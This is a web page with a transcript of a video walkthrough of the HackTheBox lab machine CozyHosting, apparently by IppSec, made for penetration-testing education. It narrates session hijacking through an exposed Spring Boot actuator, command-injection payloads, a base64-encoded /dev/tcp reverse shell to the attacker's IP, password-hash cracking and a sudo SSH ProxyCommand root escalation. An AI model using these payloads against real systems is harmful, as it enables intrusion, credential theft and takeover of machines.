HackTheBox - CozyHosting
Key Takeaways
The video demonstrates a cybersecurity attack on a vulnerable web application, CozyHosting, using tools such as Nmap, Spring Boot, and SSH, to gain root access and exploit vulnerabilities.
Full Transcript
what's going on YouTube this is ipack I'm doing cozy hosting from hack the box which starts out with just a web page and the next step can be pretty tough to find if your recon game isn't good because um you have to identify the framework being used which is spring boot because if you use that it points you to a spring boot word list that you can use for dur busting that has a magic word called actuator in it an actuator is a debug thing developers can do to Spring boot applications in order to get some extra information out of it the session actuator lets you query all the sessions on the web page um from just a get request so we can do that dump the sessions do a session hijack become admin that leads to a place where there's a basic rce vulnerability we get into the server then we have to unzip the Java app look at the properties get the postgress credential which lets us crack a password and then we get to another user that can do a GTFO bin with SSH through the proxy command functionality and we'll spend a little bit of time explaining what a proxy command is in SSH so let's just jump in as always we're going to start off with with an end map so- SCC for default scripts SV enumerate versions OA output all formats put in the end map directory and call it cozy hosting then the IP address of 1010 111230 this can take some time to run so I've already ran it looking at the results we have just two ports open the first one being SSH on Port 22 and its Banner tells us it's an auntu server then we have HTTP on Port 80 its Banner tells us its engine X also running on Ubuntu and it's directing us over to Cozy hosting htb so let's go ahead and add this to our host file so Pudo V host then we can do 10 10 11 to30 and cozy hosting htb so let's just go take a look at the website because there's not much else for us so I'm going to go to http 1010 11230 it's going to redirect us over to Cozy hosting once I tell burp site not to intercept so going here it looks like we have have the page and cozy hosting is some type of web hosting business so the first thing I want to do is kind of look at where I can interact with the server because right now it just looks like a single page if I click on any of the business plans it redirects me back to the top Home Services pricing log so login is really the only place I can interact with it so let's just try logging in with admin admin to see if we can get in with default credentials no luck there so at this point I want to start a go Buster so I have some type of Recon running in the background so I'm going to do a gobster directory mode dasu cozy hosting htb opt secist Discovery uh web content then raft small words. text okay so now that we have that running it is going to tell us all the pages we have there is a/ admin but we get a access to n message um SL era goes to 500 but we really want to um identify what framework is being used here so I'm going to send another login request and we're going to examine the response and right off the bat I see J session ID and whenever I see J session ID mixed with engine X I always just test for like dot do vulnerabilities um so I'm going to go in the repeater Tab and since it's doing SL login I really doubt there's an engine X rule mapping specifically log to um the Tomcat or Java server so I really don't think it's going to be some type of off by slash thing but um there is kind of a way we can check that if you look at the headers we see there are 12 and let me change this over to a get request real quick uh change request type method there we go it's not going to be valid for this this one but I like doing a get because eventually I'm going to try to get to like slash um manager slash administrator examples which are common things in tomcat and I'm just thinking Tomcat because I see J session ID right um so that's why I changed to get right there but I see 13 different headers if I just do a get on slash let's see how many headers there are there's 13 so normally when it passes to a different middleware that may add some type of header you normally see it like X powered by but I mean normally engine X just won't send out this x content type so we can further test it with like dot dot and right here we're seeing um engine X is just saying this is a bad request right away if I add a semicolon here now we hit the Tomcat server but because um we're at slash there's no chance for an off by SL vulnerability that would allow us to do directory traversal here right because for that off by SL thing to happen it needs to have like a location and then we can say um comcat app so anything that engine X sees as this it would redirect but um since we're at The Parent Directory it's this so there's no way that this location can't end with a slash um and that example the Tomcat app needed um a trailing slash if you are confused check out the engine X off by slash but I just wanted to go my logic why I'm not going too much down that road uh we could try like manager HTML that Tomcat path we get a error there if we do it this way um we get a bad request and odly enough I think I don't know why this oh that's a 400 not four or four so Tom Cat just doesn't know how to handle that um but let's go back to what we saw before with manager HTML we have this 404 error page and this string is indicative to Spring boot um if we Google White Label Aerospace uh let's turn burp site off google.com here we go spring boot spring boot spring boot so almost everything is going to be spring boot if we look at our Go Buster we're not really finding anything here um it hasn't really gave us any new results since it started but there are specific word list related to Spring boot right um I'm just going to grip for spring there we go so here we go let's run this one because it's directed at the framework that's being used so we do gobster d-u um cozy hosting htb word list like that and we see they left the actuators open um the actuators are mainly debug endpoints for spring boot applications they really should not be accessible but in this case they are so if I go to actuator and we see it giving us information about the environment right um let's see the path let's see what this one looks like if we go here there's nothing really too sensitive um it does filter out the value by default so we can't access that uh let's check out mappings so let's see what the mappings looks like it's just got a list of all the end points so if if we're doing some type of API testing this would be um helpful I actually don't know what execute SSH is um that must be specific to the application because we can see htb Cloud hosting execute over SSH and it's giving the parameters so we could try sending a post right here I've never done that let's just try sending a post request right now uh post and if you're familiar with like other API things this would be like getting a Swagger documentation because it's just telling us a list of all the end points so if we do Post execute SSH we sent it and we still get a error Let's see we have to figure out exactly what this URL is Handler method does it tell us anything it's probably under like admin or something like that consume only the method the pattern it's not telling us the parameters huh let's see let's search for login oh there's a parent here I wonder if execute SSH is under something else so nine let's go up to the top 0 one no this is reading like I should be able to access it because we see get EX um actuator mappings and then post execute s so I'm not exactly sure what's going on here um I don't think we're supposed to hit this anyways so it's failing successfully I just don't understand why we're getting a white label aace I would expect something slightly different but oh well I don't know spring boot but I would look at each of these endpoints we have SL admin there is a ad host um it's not telling us if that's a get or a post same with login so I guess if it doesn't say it's a get so we could also change the request method add host we also get that error so let's just go back to what we had and let's go to actuator sessions so if we go to actuator sessions we have unauthorized this is probably going to be our session let's look at our burp 877 ends in CB 877 ends in CB then we have a session for K Anderson so this um actuator is just listing all of the sessions and we'll get into how you can disable this probably in a little bit but I do want to to try this okay um I was putting J Anderson's session here hoping um it wouldn't give the white label error space but it still does so I have no idea um what the mapping thing is in this so I'm going to right now I went in my developer tools I'm going to change my J session to J Anderson's then we're going to refresh and I noticed the disappeared and if I go to/ admin it is no longer a denied I get into the admin page and we can see there's some type of billing thing here and then there's a connection setting for this the Cozy scanner so I'm going to give my host name of 101148 I want to do ipac and I'm going to listen on Port 22 I don't think the servers on hack the box can reach back to uh Port 22 though so if I submit we can't and connection timed out if I do 1271 Port 22 what happens host key verification failed so the host was not added um let's go do burp suite and intercept this request so 127 01 hipac send it on over and let's see can I change the port so SSH does allow for ports so if I do man SSH um lowercase p so if I do lower case P let's change it to 8,000 and I want to see if I can uh make the server connect back to me so we do this we get a redirect and it's invalid host name so I guess they don't want spaces in the host name um we can try to get rid of Spaces by doing I think it's brace expansion by putting them in Brackets and then a comma where we want the space we still get invalid host name so if you are unfamiliar with that technique um let's do Echo and then we can say please subscribe and it's going to just expand what's in here using space as a delimer and it puts a space so that's what I'm doing there it's a tricky way to get um spaces in another way is using the ifs operator so we can just do um ifs like this I want to say we we have to use brackets as well so I don't think this is going to work either we still see invalid host name so we can't do anything there um I was still even going to 1271 but um invalid host name so they have some type of good filter here let's try it over here on the um username so if this is just using bash on the back end right it's probably doing SSH user at Host so oh I was adding like dasb here and that's probably what screwed it up right it always helps just thinking about what you're doing right I was trying for some type of parameter injection which would mean it's command injectable and I didn't think about the command um I guess it could have been like uh dasu for user and then like that right but most people when they SSH they use the at right so of course that's a bad host name but what if we put the- P back here right that's my next logic so let's do- P 8000 IPC and and we say username can't contain white spaces so let's do that brace expansion thing again and we have bad Port never connected to us and that is odd bad Port - capital P well we got a SSH eror message so we know um we have something so we have command injection definitely um I'm not sure why it did that though let's do ip- p 8000 still bad for so I'm not sure why we can't change the port here because we should be able to put the dasp flag but I'm going to kind of ignore that because when we did something weird um oh well we have it right now we we have the error message and this is SSH is error message so we definitely have command injection I'm going to try a sleep one and let's see I'm going to do a semicolon sleep one no let's do semicolon there and here and there we go so now we have command execution right um when you do this break expansion you have to keep it on the same thing so um when I was doing uh this it was treating this as part of the argument let's see if it shows it it doesn't do it here I wonder if I just needed it on the outside cuz nope we definitely want it on like this so we have command execution um I wonder what happened if we just did a semicolon what if we did a comment it just times out I think we probably have to URL encode it okay I was just thinking about like fuzzing I always like playing with these type of things so we have command execution um we want to get a shell so let's do um go let's get a reverse shell so I'm going to do v shell b-i Dev TCP 10 10 148 90001 Z and one like that okay base 64- w0 shell and I'm going to get rid of all the pluses because that's a dangerous character in HTTP that I just hate dealing with um that's probably right here okay and we got another Plus that's probably right here and we can get rid of those equals it's got two padding so if I added two spaces there we go now it's just pure alpha numeric so if we copy this we can Echo that in then I'm going to do um base 64- d and then I'm just going to Echo it to bash and let's see we have it not working I wonder if I need to put bash like this we did not get a Shell let's see oh it should be on 90001 Echo base 64- D do we need a DN let's try this command on our local box bash not found okay so you can't put bash in this there we go it's hanging and we get a shell so that's why I like always making my payloads as simple as possible because I knew the air wasn't going to be around this right um I'm going to take a step back and I want to see if I can prove a point real quick so if I do v shell or let's do CP shell to uh vanilla shell and I'm going to have spaces in my payload and if we copy this and we paste this in when we doing it this way we now have two errors potentially right this is going to be an error and then we don't know exactly how it's treating that plus so if we had fixed this and didn't think about going back to fix this plus it's still going to fail right let's go here whoops that's definitely going to fail because we pasted it twice right this is not working because it's encoding these pluses if I put make that a um URL in code or that's probably HTML in code then it probably works no let's see list on 90001 oh we still have it twice so 302 I'm going to URL encode this still 302 that should have worked I have no idea what just happened there we execute vanilla shell that does work base 64- W vanilla shell we need to say zero this little proving a point thing took a little bit longer than I wanted it to I thought this would be simpler okay the base 64 is bad it's still not working right so if I now you're en code this it works so you can work with like making your payload like not worrying about this if you just always get in the habit of URL encoding it but I really hate like when you first paste it that there's two potential error things and you knew before you even started this command that this could be an issue because pluses are always bad in um web packets so I just think it always is beneficial to spend the extra couple seconds to make your payload um more flexible and get rid of those encodings before they even start right um so let's listen there we go so I'm going to upgrade my shell let's do Python 3 import PTY PTY spawn bin bash okay then stty raw minus Echo FG enter enter export term is equal to to X term so I can clear the screen and now I have like tab autocomplete and everything like that so as the web user of this box the first thing I want to do is try to get the password of the user I want to say it it's like J Keaton or something because when we logged in as him we just stole his session and then put that in so we never got the password or password hash and normally the web user has the ability to view that type of information so let's go take a look at where we are so we have this Cloud hosting jar and normally when you host a Java app it will um expand the jar somewhere so I'm going to do a fine SL pipe errors to Dev null and I'm going to GP for cloud hosting and that did not work like that there we go and the only thing is this one jar file so we could just start um extracting this jar and looking in it but what we could also do is um look at how this is hosted right and you could do like system CTL um what is it I think it's list unit and then type equals service I think that's the command for this [Music] um see let's just Google system CTL list services I normally don't do it this way because I can't remember all these system CTL commands uh let's see all services running it's probably like list unit files or something units there we go you can see all the services that are running um one of them's probably going to stick out let's see do we have it um my terminal size is bad the other way you could list the services that are running would just be f/ Etsy then Dame star. service and that will list all the services here right and if we go through let's see do we have anything that sticks out grub oh cozy hosting there it is um I bet that was in the list units if I GP for cozy there we go but if we just go here let's go up we can grab this and this is going to be how system D starts this um service right so we go into the user group app and then it's going to just execute Java so it's not using Tomcat or anything at all so that's why we couldn't access like the manager interface or things like that um so let's extract this jar so to do that I'm going to copy it over to my box so I'm going to make Source I guess and then we can say NCL lvmp 90001 um cat Cloud hosting to my IP I did not direct it to a file uh to Cozy hosting dojar that would definitely help there we go so it's sending me the file and this should finish um give me a prompt back when it's done copying there we go and then we can say um 7zx to extract cozy hosting dojar and then we have all the files so if I go in let's see let's do find do dname star. properties and there's two uh we have the pal and the application if we look at the application this is going to be where the actuators are configured right we can see management endpoints web exposure include Health beans environment sessions mappings so this is all the um actuators and we can see they're enabled so if you wanted to disable them you change that to false um we see postgress credentials right here so the first thing I do is try su- postgress pasted in the password to see if we can get a shell does not look like we can uh we could probably do a psql dasu p um let's see is it- capital u then H Local Host let's see perer authentication failed we probably need a password is it lowercase p for this uh let's see first gr or let's do psql connect connecting to post grass using psql lowercase H lowercase p for the port D for database name- U for database server so H Local Host D was it capital u [Music] hdu i don't know why I didn't ask for the password before and I copied way too much copy this paste there we go so now we're on um pogress is it SL DT to enumerate tables um see first grass enumeration uh let's do hack tricks post is a little bit weird how you do enumeration so this is generally what I do don't memorize all the commands memorize how to get to them so you can do Dash list or slash list to list the databases so you have cozy hosting postgress template1 template2 so we want to um use cozy hosting and then let's see Slash D is going to list the tables I thought I'm going to exit I'm going to specify the database cozy hosting copy paste there we go it's probably not use let's do back SL D there we go we have host host ID sequence and users so if I did select star from users we can see two we have K Anderson and admin so let's grab these hashes so I'm going to grab this and we can V hashes and we can go okay Anderson like that then admin like this and now we want to go over to the Kraken to crack them so copying them then we can sh over to Kraken go inside of hashcat drop the hashes here I'm going to call this cozy hosting paste and now we can crack so I'm going to do hashcat D- username I think it's username for the flag um it's username because whenever I use hashcat I like putting username colen then the hash that way when it cracks it stores the username it went to it just makes life easy um hashes cozy hosting and opt word list rocky. text and it is going along and we need to specify the hash so I'm going to guess this is just a bcrypt hash let's look at it real quick um hashes cozy two star yeah that is probably going to be bcrypt so- m3200 there we go and if this doesn't work I'd always try a different hash as well and if there was a like register user endpoint I would register a user because that way I know my password hash put it in the database and then attempt to crack it to make sure my um mode is correct right because the application itself could always be doing something weird like um putting a hash beforehand like ing it in a non-standard way which would then uh break cracking Until you realize what it's doing so we have one hash Manchester United we don't know the username though um we could just look at the hash file and get it that way or I can just do a D- showell and we see it goes to admin right that's why I like always doing the username because it helps that way so let's go back to um our box I just do control D to exit I think back slq would as well let's cat Etsy pass WD GP for everything that ends in sh because those are going to be the shells and I'm going to guess admin is going to be Josh so I'm going to do su Josh and I always like doing s space Dash like that and then put his password in uh that was the hash that was not it um let's grab it there we go Su Josh paste it in and we get access as Josh if we do lsla uh we can see user. text we can try a pseudo- l and C we can run SSH as root so let's go over to gtf Obin and see if there's any known prives there right if I go to SSH we see a pseudo Rule and through pseudo we can use prox command to get a shell so let's try this let's do pseudo and then I'm going to say user bin SSH and then ID and we get root and that that may look weird why does the proxy command work that way um the proxy command itself is able to run a command before it runs SSH and you may be asking why would I ever want to run a command before I SSH into something right and the answer to that is whenever you have boxes that you have to establish a SSH tunnel to in order to access right so let's say our client is over here this is our client and we want to SSH to web which is over here however there's some type of uh fire wall in play that is preventing us from just going straight here um this blocks the connection so we can't just SSH directly to web however there is a Bastion host that we can SSH to because this guy has um better security policies around it and it's just being monitored right so we could SSH down here let's get rid of that and then from there we can establish a SSH tunnel so we could say like Dash capital L let's listen on Port 9022 and then any connection there goes through the bason ends up on web Port 22 and then we SSH here right Works The Annoying Thing is whenever we type SSH web but don't have this tunnel up it's going to fail and that's just a huge annoyance so what the proxy command allows us to do is say when we type SSH web type this command over here first and make sure that gets established because then we can just go to web and we don't have to worry about the Bastion because it's automatically going to um run that beforehand and it just makes life really easy and if you don't see that making your life easy I'm guessing you're thinking that most people when they use proxy command always type- o proxy command equals and no um most people when they use proxy commands they'll put it in like an SSH config right so if I go in um SSH config we can see this is the SSH config file and let's say the Box Kraken I couldn't reach directly let's say I needed to go through a different box called bason in order to access it I would just simply put a proxy command here so I could do proxy command um I'm going to do camel case like that and then I want to say the syntax would be like- Capital w%c H colon percent P for host and port and then it would be bason right so whenever I ran the um command SSH Kraken beforehand it would set up the tunnel with proxy command to Bastion to get it set up right so that is how most people use proxy command so hopefully you guys enjoyed that and that's going to conclude the video so with that being said uh take care and I'll see you all next time
Original Description
00:00 - Introduction
01:00 - Start of nmap
03:10 - Identify JSESSIONID with nginx, but nginx appears to be configured correctly
06:00 - Googling the error message to identify the page uses SpringBoot, using a SpringBoot wordlist to find actuators!
10:30 - Using the Sessions Actuator and seeing a session for kanderson, logging in to get to the admin interface
14:15 - Finding RCE in the ExecSSH Page
23:20 - Shell on CozyHosting, looking at running services
26:00 - Examining the CozyHosting Jar to identify PostGres credentials then dumping the users table and cracking hashes
33:00 - Josh can run SSH with sudo, using proxy command to get root
34:10 - Explaining what ProxyCommand is
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from IppSec · IppSec · 0 of 60
← Previous
Next →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
HHC2016 - Analytics
IppSec
HackTheBox - October
IppSec
HackTheBox - Arctic
IppSec
HackTheBox - Brainfuck
IppSec
HackTheBox - Bank
IppSec
HackTheBox - Joker
IppSec
HackTheBox - Lazy
IppSec
Camp CTF 2015 - Bitterman
IppSec
HackTheBox - Devel
IppSec
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
HackTheBox - Granny and Grandpa
IppSec
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
HackTheBox - Optimum
IppSec
HackTheBox - Charon
IppSec
HackTheBox - Sneaky
IppSec
HackTheBox - Holiday
IppSec
HackTheBox - Europa
IppSec
Introduction to tmux
IppSec
HackTheBox - Blocky
IppSec
HackTheBox - Nineveh
IppSec
HackTheBox - Jail
IppSec
HackTheBox - Blue
IppSec
HackTheBox - Calamity
IppSec
HackTheBox - Shrek
IppSec
HackTheBox - Mirai
IppSec
HackTheBox - Shocker
IppSec
HackTheBox - Mantis
IppSec
HackTheBox - Node
IppSec
HackTheBox - Kotarak
IppSec
HackTheBox - Enterprise
IppSec
HackTheBox - Sense
IppSec
HackTheBox - Minion
IppSec
VulnHub - Sokar
IppSec
VulnHub - Pinkys Palace v2
IppSec
HackTheBox - Inception
IppSec
Vulnhub - Trollcave 1.2
IppSec
HackTheBox - Ariekei
IppSec
HackTheBox - Flux Capacitor
IppSec
HackTheBox - Jeeves
IppSec
HackTheBox - Tally
IppSec
HackTheBox - CrimeStoppers
IppSec
HackTheBox - Fulcrum
IppSec
HackTheBox - Chatterbox
IppSec
HackTheBox - Falafel
IppSec
How To Create Empire Modules
IppSec
HackTheBox - Nightmare
IppSec
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
HackTheBox - Bart
IppSec
HackTheBox - Aragog
IppSec
HackTheBox - Valentine
IppSec
HackTheBox - Silo
IppSec
HackTheBox - Rabbit
IppSec
HackTheBox - Celestial
IppSec
HackTheBox - Stratosphere
IppSec
HackTheBox - Poison
IppSec
HackTheBox - Canape
IppSec
HackTheBox - Olympus
IppSec
HackTheBox - Sunday
IppSec
HackTheBox - Fighter
IppSec
HackTheBox - Bounty
IppSec
More on: Tool Use & Function Calling
View skill →Related AI Lessons
⚡
⚡
⚡
⚡
Built a suite of client-side dev tools to fix the "production data" privacy gap
Dev.to · Rayan Ahmad
5 Best BrowserStack Alternatives to Optimize Your Testing Infrastructure
Medium · DevOps
️ The Lifecycle Symphony: A Senior SRE’s Deep Dive into Init and Sidecar Containers
Medium · DevOps
`wrangler dev --remote` silently writes to your production KV namespace — here's the fix
Dev.to · 강해수
Chapters (10)
Introduction
1:00
Start of nmap
3:10
Identify JSESSIONID with nginx, but nginx appears to be configured correctly
6:00
Googling the error message to identify the page uses SpringBoot, using a Sprin
10:30
Using the Sessions Actuator and seeing a session for kanderson, logging in to
14:15
Finding RCE in the ExecSSH Page
23:20
Shell on CozyHosting, looking at running services
26:00
Examining the CozyHosting Jar to identify PostGres credentials then dumping th
33:00
Josh can run SSH with sudo, using proxy command to get root
34:10
Explaining what ProxyCommand is
🎓
Tutor Explanation
DeepCamp AI